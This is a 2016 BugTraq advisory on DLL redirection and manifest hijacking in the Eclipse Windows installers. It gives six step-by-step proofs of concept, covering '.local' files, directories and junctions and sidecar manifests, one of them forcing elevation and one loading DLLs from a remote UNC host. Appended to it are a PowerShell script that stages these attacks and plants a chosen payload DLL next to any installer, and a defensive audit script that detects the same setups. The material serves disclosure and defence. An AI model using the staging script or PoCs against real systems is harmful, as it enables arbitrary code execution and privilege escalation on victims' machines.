BugTraq
Executable installers are vulnerable^WEVIL (case 37): eclipse-inst-win*.exe vulnerable to DLL redirection and manifest hijacking Jul 23 2016 11:08AM
Stefan Kanthak (stefan kanthak nexgo de)
Hi @ll,

this is a followup to "case 36" (posted as "case 35" by mistake),
<http://seclists.org/bugtraq/2016/Jul/82>.

Proof of concept #1:
~~~~~~~~~~~~~~~~~~~~

1. On a 64-bit edition of Windows download the 32-bit and 64-bit
executable installers "eclipse-inst-win32.exe" and
"eclipse-inst-win64.exe", save them in an arbitrary directory.

2. Create the (empty) files "eclipse-inst-win32.exe.local" and
"eclipse-inst-win64.exe.local" in the directory where you
saved the downloaded installers:
Copy NUL: eclipse-inst-win32.exe.local
Copy NUL: eclipse-inst-win64.exe.local

3. Create empty files kernel32.dll, kernelbase.dll, advapi32.dll,
msvcrt.dll, ..., version.dll in the directory where you saved
the downloaded installers.

4. Execute the downloaded installers.

DOSSED!

5. Replace the empty DLLs created in step 3 with (malicious) DLLs
of your choice.

6. Execute the downloaded installer which matches the processor
architecture of the DLLs placed in step 5.

PWNED!

Proof of concept #2:
~~~~~~~~~~~~~~~~~~~~

1. On a 64-bit edition of Windows download the 32-bit and 64-bit
executable installers "eclipse-inst-win32.exe" and
"eclipse-inst-win64.exe", save them in an arbitrary directory.

2. Create the subdirectories "eclipse-inst-win32.exe.local" and
"eclipse-inst-win64.exe.local" in the directory where you
saved the downloaded installers.

3. Copy any (malicious) DLL of your choice as kernel32.dll,
kernelbase.dll, advapi32.dll, msvcrt.dll, ..., version.dll
into the subdirectories created in step 2 (32-bit DLLs
into "eclipse-inst-win32.exe.local", 64-bit DLLs into
"eclipse-inst-win64.exe.local").

4. Execute the downloaded installers.

DOSSED or PWNED!

Proof of concept #3:
~~~~~~~~~~~~~~~~~~~~

1. On a 64-bit edition of Windows download the 32-bit and 64-bit
executable installers "eclipse-inst-win32.exe" and
"eclipse-inst-win64.exe", save them in an arbitrary directory.

2. Create the junctions "eclipse-inst-win32.exe.local" and
"eclipse-inst-win64.exe.local" in the directory where you
saved the downloaded installers:
MkLink /J eclipse-inst-win32.exe.local %SystemRoot%\System32
MkLink /J eclipse-inst-win64.exe.local %SystemRoot%\SysWow64

3. Execute the downloaded installers.

DOSSED!

4. Create the two junctions to directories with malicious DLLs of
your choice if you want to get pwned instead.

5. Execute the downloaded installers.

PWNED!

Proof of concept #4:
~~~~~~~~~~~~~~~~~~~~

1. On a 64-bit edition of Windows download the 32-bit and 64-bit
executable installers "eclipse-inst-win32.exe" and
"eclipse-inst-win64.exe", save them in an arbitrary directory.

2. Create the files "eclipse-inst-win32.exe.manifest" and
"eclipse-inst-win64.exe.manifest" with the following contents
in the directory where you saved the downloaded installers:

--- eclipse-inst-win*.exe.manifest ---
<?xml version="1.0" encoding="US-ASCII" standalone="yes"?>
<assembly
manifestVersion="1.0"
xmlns="urn:schemas-microsoft-com:asm.v1">
</assembly>
--- EOF ---

3. Execute the downloaded installers.

DOSSED!

Proof of concept #5:
~~~~~~~~~~~~~~~~~~~~

1. On a 64-bit edition of Windows download the 32-bit and 64-bit
executable installers "eclipse-inst-win32.exe" and
"eclipse-inst-win64.exe", save them in an arbitrary directory.

2. Create the files "eclipse-inst-win32.exe.manifest" and
"eclipse-inst-win64.exe.manifest" with the following contents
in the directory where you saved the downloaded installers:

--- eclipse-inst-win*.exe.manifest ---
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly
  manifestVersion="1.0"
  xmlns="urn:schemas-microsoft-com:asm.v1">
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
    <security>
      <requestedPrivileges>
        <requestedExecutionLevel level="requireAdministrator"/>
      </requestedPrivileges>
    </security>
  </trustInfo>
</assembly>
--- EOF ---

3. Execute the downloaded installers:
Windows "user account control" will prompt for elevation, all
hijacked DLLs will be executed with administrative privileges.

PWNED!

Proof of concept #6:
~~~~~~~~~~~~~~~~~~~~

1. On a 64-bit edition of Windows download the 32-bit and 64-bit
executable installers "eclipse-inst-win32.exe" and
"eclipse-inst-win64.exe", save them in an arbitrary directory.

2. Create the files "eclipse-inst-win32.exe.manifest" and
"eclipse-inst-win64.exe.manifest" with the following contents
in the directory where you saved the downloaded installers:

--- eclipse-inst-win32.exe.manifest ---
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly
manifestVersion="1.0"
xmlns="urn:schemas-microsoft-com:asm.v1">
<file
loadFrom="\\127.0.0.1\ADMIN$\System32\Kernel32.Dll"
name="Kernel32.Dll" />
</assembly>
--- EOF ---

--- eclipse-inst-win64.exe.manifest ---
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly
manifestVersion="1.0"
xmlns="urn:schemas-microsoft-com:asm.v1">
<file
loadFrom="\\127.0.0.1\ADMIN$\SysWoW64\Kernel32.Dll"
name="Kernel32.Dll"/>
</assembly>
--- EOF ---

Optionally add more <file> elements for other DLLs loaded by
the installers as you like.

3. Execute the downloaded installers.

DOSSED!

4. Replace the UNC pathnames to your own host with UNC paths to
any host reachable from your network where you placed some
malicious DLLs to get pwned instead.

5. Execute the downloaded installers.

PWNED!

6. Add the <trustInfo> element from PoC #5 to achieve remote code
execution with (user-assisted) escalation of privilege.

7. Execute the downloaded installers.

PWNED²!
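The six procedures above are variations of one setup: put a ".local" file, directory or junction, or a sidecar ".manifest", next to the installer and run it. The PowerShell script below is an added example (not part of Stefan Kanthak's post and not an Eclipse artifact) that stages the variants of PoC #1 to #5 against an arbitrary installer path, runs it and reports the exit code as an NTSTATUS-shaped hex value. Parameter and function names ($Installer, $Mode, $PayloadDll, Get-PeMachine, Add-PlantedDll, Write-SidecarManifest) are hypothetical; "New-Item -ItemType Junction" stands in for the post's "MkLink /J", and the manifest text is checked for well-formedness before it is written.

```powershell
# Added example, not from the post: stage one ".local"/manifest condition
# next to an installer, run it, report the exit code. Names are hypothetical.
[CmdletBinding()]
param(
    [Parameter(Mandatory)][string]$Installer,   # e.g. "$env:USERPROFILE\Downloads\eclipse-inst-win64.exe"
    [ValidateSet('LocalFile','LocalDir','Junction','EmptyManifest','AdminManifest','Cleanup')]
    [string]$Mode = 'LocalFile',
    [string]$PayloadDll,                        # optional DLL to plant instead of 0-byte files (must match the installer's bitness)
    [string[]]$DllNames = @('kernel32.dll','kernelbase.dll','advapi32.dll','msvcrt.dll','version.dll')
)
$ErrorActionPreference = 'Stop'
$Installer = (Resolve-Path -LiteralPath $Installer).Path
$dir       = Split-Path -Parent $Installer
$local     = "$Installer.local"
$manifest  = "$Installer.manifest"

# IMAGE_FILE_HEADER.Machine: 0x014C = x86, 0x8664 = x64
function Get-PeMachine([string]$Path) {
    $b = [IO.File]::ReadAllBytes($Path)
    [BitConverter]::ToUInt16($b, [BitConverter]::ToInt32($b, 0x3C) + 4)
}

# Plant the DLL names from the PoC; a 0-byte file is enough for the DoS variant
function Add-PlantedDll([string]$Target) {
    foreach ($n in $DllNames) {
        $dst = Join-Path $Target $n
        if ($PayloadDll) { Copy-Item -LiteralPath $PayloadDll -Destination $dst -Force }
        else { New-Item -ItemType File -Path $dst -Force | Out-Null }
    }
}

# Validate before writing: a manifest that is not well-formed XML (e.g. a missing '>')
# makes the loader reject the image for a different reason than the one under test
function Write-SidecarManifest([string]$Xml) {
    $null = [xml]$Xml
    [IO.File]::WriteAllText($manifest, $Xml, [Text.UTF8Encoding]::new($false))
}

$emptyManifest = @'
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">
</assembly>
'@
$adminManifest = @'
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
    <security>
      <requestedPrivileges>
        <requestedExecutionLevel level="requireAdministrator"/>
      </requestedPrivileges>
    </security>
  </trustInfo>
</assembly>
'@

switch ($Mode) {
    'LocalFile'     { New-Item -ItemType File -Path $local -Force | Out-Null; Add-PlantedDll $dir }        # PoC #1
    'LocalDir'      { New-Item -ItemType Directory -Path $local -Force | Out-Null; Add-PlantedDll $local } # PoC #2
    'Junction'      {                                                                                      # PoC #3 (DoS variant)
        # redirect to the system directory of the *other* bitness; the reparse point is resolved
        # by the file system, so WOW64 path redirection does not rescue a 32-bit installer
        $wrong = if ((Get-PeMachine $Installer) -eq 0x8664) { "$env:SystemRoot\SysWOW64" } else { "$env:SystemRoot\System32" }
        New-Item -ItemType Junction -Path $local -Value $wrong | Out-Null
    }
    'EmptyManifest' { Write-SidecarManifest $emptyManifest }                                               # PoC #4
    'AdminManifest' { Write-SidecarManifest $adminManifest }                                               # PoC #5
    'Cleanup'       {
        if (Test-Path -LiteralPath $local) {
            $item = Get-Item -LiteralPath $local -Force
            # never Remove-Item -Recurse a junction: delete the reparse point itself, not its target
            if (($item.Attributes -band [IO.FileAttributes]::ReparsePoint) -ne 0) { [IO.Directory]::Delete($local) }
            else { Remove-Item -LiteralPath $local -Recurse -Force }
        }
        Remove-Item -LiteralPath $manifest -Force -ErrorAction SilentlyContinue
        foreach ($n in $DllNames) { Remove-Item -LiteralPath (Join-Path $dir $n) -Force -ErrorAction SilentlyContinue }
        return
    }
}

# Start-Process goes through ShellExecute, so a requireAdministrator sidecar manifest
# raises the UAC prompt exactly as in PoC #5; a declined prompt lands in the catch block
try {
    $p = Start-Process -FilePath $Installer -PassThru -Wait
    '{0}: {1} exited with 0x{2:X8}' -f $Mode, (Split-Path -Leaf $Installer), $p.ExitCode
} catch {
    '{0}: launch failed: {1}' -f $Mode, $_.Exception.Message
}
```

Run it once per mode and finish with -Mode Cleanup; the "pwned" variants of PoC #1 to #3 follow by passing a DLL of the right bitness in -PayloadDll, or by pointing the junction at a directory of your own instead of the system directory. The cleanup path is deliberately careful with the junction: a recursive delete that follows the reparse point would operate on %SystemRoot%\System32.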

stay tuned
Stefan Kanthak
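For the defender's side, the following PowerShell audit is an added example (not from the post) that lists, for every executable in a download directory, the conditions the PoCs above rely on: a ".local" file, directory or reparse point next to it, a sidecar ".manifest", planted copies of the DLL names used in the PoCs, and whether the image itself embeds an application manifest (on Windows Vista and later an embedded manifest takes precedence over a sidecar one, so the last column tells you whether PoC #4 to #6 even have a hook). The function names Test-EmbeddedManifest and Get-InstallerHijackSurface are hypothetical; the Win32 calls are LoadLibraryExW with LOAD_LIBRARY_AS_DATAFILE (maps the file without running any of its code), FindResourceW and FreeLibrary.

```powershell
# Added example, not from the post: audit downloaded executables for
# DLL-redirection and manifest-hijacking preconditions. Names are hypothetical.
Add-Type -Namespace Win32 -Name Resource -MemberDefinition @'
[DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
public static extern IntPtr LoadLibraryExW(string lpFileName, IntPtr hFile, uint dwFlags);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr FindResourceW(IntPtr hModule, IntPtr lpName, IntPtr lpType);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool FreeLibrary(IntPtr hModule);
'@

# $true if the image carries an RT_MANIFEST resource under one of the usual IDs
# (1 = CREATEPROCESS, 2 = ISOLATIONAWARE, 3 = ISOLATIONAWARE_NOSTATICIMPORT),
# $false if not, $null if the file could not be mapped at all
function Test-EmbeddedManifest([string]$Path) {
    $LOAD_LIBRARY_AS_DATAFILE = 0x2     # map as data: no DllMain, no imports, any bitness
    $RT_MANIFEST = [IntPtr]24
    $h = [Win32.Resource]::LoadLibraryExW($Path, [IntPtr]::Zero, $LOAD_LIBRARY_AS_DATAFILE)
    if ($h -eq [IntPtr]::Zero) { return $null }
    try {
        foreach ($id in 1, 2, 3) {
            if ([Win32.Resource]::FindResourceW($h, [IntPtr]$id, $RT_MANIFEST) -ne [IntPtr]::Zero) { return $true }
        }
        return $false
    } finally {
        [void][Win32.Resource]::FreeLibrary($h)
    }
}

function Get-InstallerHijackSurface([string]$Directory = "$env:USERPROFILE\Downloads") {
    $planted = 'kernel32.dll','kernelbase.dll','advapi32.dll','msvcrt.dll','version.dll'  # names from the PoCs
    foreach ($exe in Get-ChildItem -Path $Directory -Filter *.exe -File) {
        $local = Get-Item -LiteralPath "$($exe.FullName).local" -Force -ErrorAction SilentlyContinue
        $localKind = if (-not $local) { $null }
                     elseif (($local.Attributes -band [IO.FileAttributes]::ReparsePoint) -ne 0) { "$($local.LinkType) -> $($local.Target)" }
                     elseif ($local.PSIsContainer) { 'directory' }
                     else { 'file' }
        $loose = Get-ChildItem -Path $exe.DirectoryName -Filter *.dll -File |
                 Where-Object { $planted -contains $_.Name } | ForEach-Object Name
        [pscustomobject]@{
            Executable       = $exe.Name
            EmbeddedManifest = Test-EmbeddedManifest $exe.FullName
            DotLocal         = $localKind
            SidecarManifest  = Test-Path -LiteralPath "$($exe.FullName).manifest" -PathType Leaf
            PlantedDlls      = ($loose -join ',')
        }
    }
}

Get-InstallerHijackSurface | Format-Table -AutoSize
```

Any row with a non-empty DotLocal, SidecarManifest or PlantedDlls column is a staged attack (or a leftover from the procedures above); a row whose executable reports EmbeddedManifest = False is one whose loader behaviour can still be steered from the download directory by a sidecar manifest.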
